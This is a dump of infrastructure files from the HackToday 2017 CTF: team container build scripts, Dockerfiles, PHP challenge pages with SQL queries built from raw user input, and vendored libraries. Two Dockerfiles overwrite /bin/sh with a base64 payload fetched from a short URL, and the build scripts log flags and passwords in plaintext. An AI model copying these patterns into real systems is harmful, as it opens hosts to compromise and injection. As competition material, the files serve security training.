| tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo 
"$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:80" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/scripts/format-hex.js: -------------------------------------------------------------------------------- 1 | /* 2 | CryptoJS v3.1.2 3 | code.google.com/p/crypto-js 4 | (c) 2009-2013 by Jeff Mott. All rights reserved. 5 | code.google.com/p/crypto-js/wiki/License 6 | */ 7 | (function (undefined) { 8 | // Shortcuts 9 | var C = CryptoJS; 10 | var C_lib = C.lib; 11 | var CipherParams = C_lib.CipherParams; 12 | var C_enc = C.enc; 13 | var Hex = C_enc.Hex; 14 | var C_format = C.format; 15 | 16 | var HexFormatter = C_format.Hex = { 17 | /** 18 | * Converts the ciphertext of a cipher params object to a hexadecimally encoded string. 19 | * 20 | * @param {CipherParams} cipherParams The cipher params object. 21 | * 22 | * @return {string} The hexadecimally encoded string. 23 | * 24 | * @static 25 | * 26 | * @example 27 | * 28 | * var hexString = CryptoJS.format.Hex.stringify(cipherParams); 29 | */ 30 | stringify: function (cipherParams) { 31 | return cipherParams.ciphertext.toString(Hex); 32 | }, 33 | 34 | /** 35 | * Converts a hexadecimally encoded ciphertext string to a cipher params object. 36 | * 37 | * @param {string} input The hexadecimally encoded string. 38 | * 39 | * @return {CipherParams} The cipher params object. 
40 | * 41 | * @static 42 | * 43 | * @example 44 | * 45 | * var cipherParams = CryptoJS.format.Hex.parse(hexString); 46 | */ 47 | parse: function (input) { 48 | var ciphertext = Hex.parse(input); 49 | return CipherParams.create({ ciphertext: ciphertext }); 50 | } 51 | }; 52 | }()); 53 | -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="02" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 
0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg="binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/sanca/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="08" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo 
"$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="03" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> 
$docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="05" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | 
echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="06" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: 
$cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/header.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional/LoginFormCest.php: -------------------------------------------------------------------------------- 1 | amOnRoute('site/login'); 7 | } 8 | 9 | public function openLoginPage(\FunctionalTester $I) 10 | { 11 | $I->see('Login', 'h1'); 12 | 13 | } 14 | 15 | // demonstrates `amLoggedInAs` method 16 | public function internalLoginById(\FunctionalTester $I) 17 | { 18 | $I->amLoggedInAs(100); 19 | $I->amOnPage('/'); 20 | $I->see('Logout (admin)'); 21 | } 22 | 23 | // demonstrates `amLoggedInAs` method 24 | public function internalLoginByInstance(\FunctionalTester $I) 25 | { 26 | $I->amLoggedInAs(\app\models\User::findByUsername('admin')); 27 | $I->amOnPage('/'); 28 | $I->see('Logout (admin)'); 29 | } 30 | 31 | public function loginWithEmptyCredentials(\FunctionalTester $I) 32 | { 33 | $I->submitForm('#login-form', []); 34 | $I->expectTo('see validations errors'); 35 | $I->see('Username cannot be blank.'); 36 | $I->see('Password cannot be blank.'); 37 | } 38 | 39 | public function loginWithWrongCredentials(\FunctionalTester $I) 40 | { 41 | $I->submitForm('#login-form', [ 42 | 'LoginForm[username]' => 'admin', 43 | 'LoginForm[password]' => 'wrong', 44 | ]); 45 | $I->expectTo('see validations errors'); 46 | 
$I->see('Incorrect username or password.'); 47 | } 48 | 49 | public function loginSuccessfully(\FunctionalTester $I) 50 | { 51 | $I->submitForm('#login-form', [ 52 | 'LoginForm[username]' => 'admin', 53 | 'LoginForm[password]' => 'admin', 54 | ]); 55 | $I->see('Logout (admin)'); 56 | $I->dontSeeElement('form#login-form'); 57 | } 58 | } -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/register.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT * FROM user WHERE username='$username'"); 4 | } 5 | 6 | if(isset($_SESSION['login'])){ 7 | header("location: profile"); 8 | } 9 | 10 | if($_SERVER['REQUEST_METHOD'] === 'POST'){ 11 | $username = htmlspecialchars(filter_var($_POST['username'], FILTER_SANITIZE_STRING)); 12 | $password = htmlspecialchars(filter_var($_POST['password'], FILTER_SANITIZE_STRING)); 13 | 14 | if($username && $password){ 15 | if(!user_exist($username, $db)){ 16 | $sql = "INSERT INTO user (username, password) VALUES ('$username', '$password')"; 17 | if($db->exec($sql)){ 18 | $_SESSION['register_info'] = "Register success, now you can login"; 19 | header("location: login"); 20 | } 21 | }else{ 22 | die(""); 23 | } 24 | }else{ 25 | die(""); 26 | } 27 | } 28 | ?> 29 | 30 |

Register


-------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/inputmask.extensions.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * inputmask.extensions.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["./dependencyLibs/inputmask.dependencyLib","./inputmask"],a):"object"==typeof exports?module.exports=a(require("./dependencyLibs/inputmask.dependencyLib"),require("./inputmask")):a(window.dependencyLib||jQuery,window.Inputmask)}(function(a,b){return b.extendDefinitions({A:{validator:"[A-Za-z\u0410-\u044f\u0401\u0451\xc0-\xff\xb5]",cardinality:1,casing:"upper"},"&":{validator:"[0-9A-Za-z\u0410-\u044f\u0401\u0451\xc0-\xff\xb5]",cardinality:1,casing:"upper"},"#":{validator:"[0-9A-Fa-f]",cardinality:1,casing:"upper"}}),b.extendAliases({url:{definitions:{i:{validator:".",cardinality:1}},mask:"(\\http://)|(\\http\\s://)|(ftp://)|(ftp\\s://)i{+}",insertMode:!1,autoUnmask:!1,inputmode:"url"},ip:{mask:"i[i[i]].i[i[i]].i[i[i]].i[i[i]]",definitions:{i:{validator:function(a,b,c,d,e){return c-1>-1&&"."!==b.buffer[c-1]?(a=b.buffer[c-1]+a,a=c-2>-1&&"."!==b.buffer[c-2]?b.buffer[c-2]+a:"0"+a):a="00"+a,new RegExp("25[0-5]|2[0-4][0-9]|[01][0-9][0-9]").test(a)},cardinality:1}},onUnMask:function(a,b,c){return a},inputmode:"numeric"},email:{mask:"*{1,64}[.*{1,64}][.*{1,64}][.*{1,63}]@-{1,63}.-{1,63}[.-{1,63}][.-{1,63}]",greedy:!1,onBeforePaste:function(a,b){return a=a.toLowerCase(),a.replace("mailto:","")},definitions:{"*":{validator:"[0-9A-Za-z!#$%&'*+/=?^_`{|}~-]",cardinality:1,casing:"lower"},"-":{validator:"[0-9A-Za-z-]",cardinality:1,casing:"lower"}},onUnMask:function(a,b,c){return 
a},inputmode:"email"},mac:{mask:"##:##:##:##:##:##"},vin:{mask:"V{13}9{4}",definitions:{V:{validator:"[A-HJ-NPR-Za-hj-npr-z\\d]",cardinality:1,casing:"upper"}},clearIncomplete:!0,autoUnmask:!0}}),b}); -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | 13 | # Read arg (ARG/ENV values, including flag and password, stay readable in the image config and build history) 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV gambar='buaya.gambar' 23 | ENV username=${username} 24 | ENV password=${password} 25 | 26 | RUN id_buaya=$(/usr/bin/shuf -i150-20000 -n1) && adduser -u $id_buaya --disabled-password --gecos "" buaya 27 | 28 | #RUN adduser -u 2121 buaya 29 | 30 | # Set WorkDir 31 | RUN mkdir /app 32 | WORKDIR /app 33 | 34 | 35 | # SSH Docker 36 | EXPOSE 22 37 | RUN mkdir /var/run/sshd 38 | #RUN adduser -u $id_buaya buaya 39 | RUN adduser -u 841 --disabled-password --gecos "" $username 40 | RUN echo "$username:$password" | chpasswd 41 | #RUN echo "buaya:akuadalahbuayaterbaikdilembagasurveyindonesia" | chpasswd 42 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 43 | 44 | 45 | # Copy ruby to workdir 46 | COPY $binary /app/$binary 47 | COPY $gambar /app/$gambar 48 | RUN echo $flag > "/app/$flag_name" 49 | 50 | RUN chown buaya:buaya $flag_name && chmod 600 $flag_name 51 | RUN chown "buaya:$username" $binary && chmod 4775 $binary 52 | 53 | 54 | # Securing environment (note: /bin/sh is replaced by a base64 payload downloaded from a short URL with no checksum or pinned source) 55 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 56 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 57 | RUN
chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/base64 /usr/bin/scp 58 | 59 | # Run Program 60 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 61 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 62 | CMD ["/start.sh"] 63 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/login.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT * FROM user WHERE username='$username' AND password='$password'", true); 12 | if($user){ 13 | $data = ['id' => $user['id'], 'username' => $user['username']]; 14 | $_SESSION['login'] = $data; 15 | header("location: profile"); 16 | }else{ 17 | echo ""; 18 | } 19 | 20 | }else{ 21 | die(""); 22 | } 23 | } 24 | ?> 25 | 26 |

Login


-------------------------------------------------------------------------------- /2017-finals/soal/math_service/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | RUN apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev nodejs -y 13 | RUN apt-get install ruby-full -y 14 | # Read arg (ARG/ENV values, including flag and password, stay readable in the image config and build history) 15 | ARG flag 16 | ARG flag_name 17 | ARG binary 18 | ARG username 19 | ARG password 20 | ENV flag=${flag} 21 | ENV flag_name=${flag_name} 22 | ENV binary=${binary} 23 | ENV username=${username} 24 | ENV password=${password} 25 | 26 | # Set WorkDir 27 | RUN mkdir /app 28 | WORKDIR /app 29 | 30 | 31 | # SSH Docker 32 | EXPOSE 22 33 | RUN mkdir /var/run/sshd 34 | RUN adduser --disabled-password --gecos "" $username 35 | RUN echo "$username:$password" | chpasswd 36 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 37 | 38 | 39 | # Copy ruby to workdir 40 | COPY $binary /app/$binary 41 | 42 | RUN echo $flag > "/app/$flag_name" 43 | 44 | RUN chown root:root $flag_name && chmod 755 $flag_name 45 | RUN chown "root:$username" $binary && chmod 775 $binary 46 | 47 | RUN cp /usr/bin/ruby /usr/local/bin/ 48 | 49 | # Securing environment (note: /bin/sh is replaced by a base64 payload downloaded from a short URL with no checksum or pinned source) 50 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 51 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 52 | RUN chmod 755 /usr/bin/env /usr/bin/ruby /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python 53 | #RUN chmod 777 /usr/bin/ruby 54 | 55 |
# Run Program 56 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 57 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 58 | CMD ["/start.sh"] -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/gulpfile.js: -------------------------------------------------------------------------------- 1 | 'use strict'; 2 | 3 | var gulp = require('gulp'), 4 | plugins = {}, 5 | params = {}; 6 | 7 | var spawn = require('child_process').spawn; 8 | plugins.exec = function(cmd, args, cb) { 9 | var proc = spawn(cmd, args); 10 | proc.stdout.on('data', function(stdout) { 11 | if(stdout) console.log(stdout); 12 | }); 13 | 14 | proc.stderr.on('data', function(stderr) { 15 | if(stderr) console.error(stderr); 16 | }); 17 | 18 | proc.on('close', function(code) { 19 | if(code != 0) cb(new Error('Command: "' + cmd + ' ' + args.join(' ') + '" exited with exit code: ' + code)); 20 | else cb(); 21 | }); 22 | }; 23 | 24 | plugins.async = require('async'); 25 | plugins.path = require('path'); 26 | plugins.runSequence = require('run-sequence'); 27 | 28 | plugins.istanbul = require('gulp-istanbul'); 29 | plugins.mocha = require('gulp-mocha'); 30 | plugins.plumber = require('gulp-plumber'); 31 | 32 | params.outputPath = 'artifacts/'; 33 | params.coveragePath = 'coverage/'; 34 | params.testReportsPath = 'test_reports/' 35 | params.cli = require('minimist')(process.argv.slice(2), {}); 36 | 37 | // Get Tasks 38 | require('./build_tasks/app_tasks')(gulp, plugins, params); 39 | require('./build_tasks/api_tasks')(gulp, plugins, params); 40 | require('./build_tasks/automation_tasks')(gulp, plugins, params); 41 | 42 | gulp.task('clean:paths', function(cb) { 43 | plugins.async.each([ 44 | params.outputPath, 45 | params.coveragePath, 46 | params.testReportsPath 47 | ], function(path, finished) { 48 | plugins.exec('rm', 
['-rf', plugins.path.join(__dirname, path)], finished); 49 | }, cb); 50 | }); 51 | 52 | gulp.task('build:paths', function(cb) { 53 | plugins.async.each([ 54 | params.outputPath, 55 | params.coveragePath, 56 | params.testReportsPath 57 | ], function(path, finished) { 58 | plugins.exec('mkdir', [plugins.path.join(__dirname, path)], finished); 59 | }, cb); 60 | }); 61 | 62 | gulp.task('default', [], function(cb) { 63 | plugins.runSequence('clean:paths', 'build:paths', function() { 64 | cb(); 65 | }); 66 | }); -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/inputmask.phone.extensions.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * inputmask.phone.extensions.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["./dependencyLibs/inputmask.dependencyLib","./inputmask"],a):"object"==typeof exports?module.exports=a(require("./dependencyLibs/inputmask.dependencyLib"),require("./inputmask")):a(window.dependencyLib||jQuery,window.Inputmask)}(function(a,b){function c(a,b){var c=(a.mask||a).replace(/#/g,"9").replace(/\)/,"9").replace(/[+()#-]/g,""),d=(b.mask||b).replace(/#/g,"9").replace(/\)/,"9").replace(/[+()#-]/g,""),e=(a.mask||a).split("#")[0],f=(b.mask||b).split("#")[0];return 0===f.indexOf(e)?-1:0===e.indexOf(f)?1:c.localeCompare(d)}var d=b.prototype.analyseMask;return b.prototype.analyseMask=function(b,c,e){function f(a,c,d){c=c||"",d=d||h,""!==c&&(d[c]={});for(var e="",g=d[c]||d,i=a.length-1;i>=0;i--)b=a[i].mask||a[i],e=b.substr(0,1),g[e]=g[e]||[],g[e].unshift(b.substr(1)),a.splice(i,1);for(var j in g)g[j].length>500&&f(g[j].slice(),j,g)}function g(b){var c="",d=[];for(var f in 
b)a.isArray(b[f])?1===b[f].length?d.push(f+b[f]):d.push(f+e.groupmarker.start+b[f].join(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)+e.groupmarker.end):d.push(f+g(b[f]));return 1===d.length?c+=d[0]:c+=e.groupmarker.start+d.join(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)+e.groupmarker.end,c}var h={};return e.phoneCodes&&(e.phoneCodes&&e.phoneCodes.length>1e3&&(b=b.substr(1,b.length-2),f(b.split(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)),b=g(h)),b=b.replace(/9/g,"\\9")),d.call(this,b,c,e)},b.extendAliases({abstractphone:{groupmarker:{start:"<",end:">"},countrycode:"",phoneCodes:[],mask:function(a){return a.definitions={"#":b.prototype.definitions[9]},a.phoneCodes.sort(c)},keepStatic:!0,onBeforeMask:function(a,b){var c=a.replace(/^0{1,2}/,"").replace(/[\s]/g,"");return(c.indexOf(b.countrycode)>1||-1===c.indexOf(b.countrycode))&&(c="+"+b.countrycode+c),c},onUnMask:function(a,b,c){return a.replace(/[()#-]/g,"")},inputmode:"tel"}}),b}); -------------------------------------------------------------------------------- /2017-quals/README.md: -------------------------------------------------------------------------------- 1 | Progress 2 | -------- 3 | **[###############] 15 / 15** 4 | 5 | 6 | No | Level | Poin | Tipe | Soal | Status | Dockerized | Deployed (PORT/SERVER)| Tested 7 | ---|-----------|-------|------------------------|---------------|--------|------------|-----------------------|------- 8 | 1 | Easy | 62 | Reverse Engineering | balikin | Done | ➖ | ✔️ | ✔️ 9 | 2 | Easy | 65 | Web Hacking | - | Dev | ✔️ | ✔️ 40065/2 | ✔️ 10 | 3 | Easy | 67 | Cryptography | WutDiHell | Done | ➖ | ✔️ | ✔️ 11 | 4 | Easy | 69 | Forensics | dump incident | Done | ➖ | ✔️ | ✔️ 12 | 5 | Easy | 71 | Cryptography | circle | Done | ➖ | ✔️ | ✔️ 13 | 6 | Easy | 73 | Exploitation | mrx | Done | ✔️ | ✔️ 40073/1 | ✔️ 14 | 7 | Easy | 74 | Exploitation | turuturu | Done | ✔️ | ✔️ 40074/1 | ✔️ 15 | 8 | Medium | 87 | Cryptography | cbc | Done | ✔️ | ✔️ 
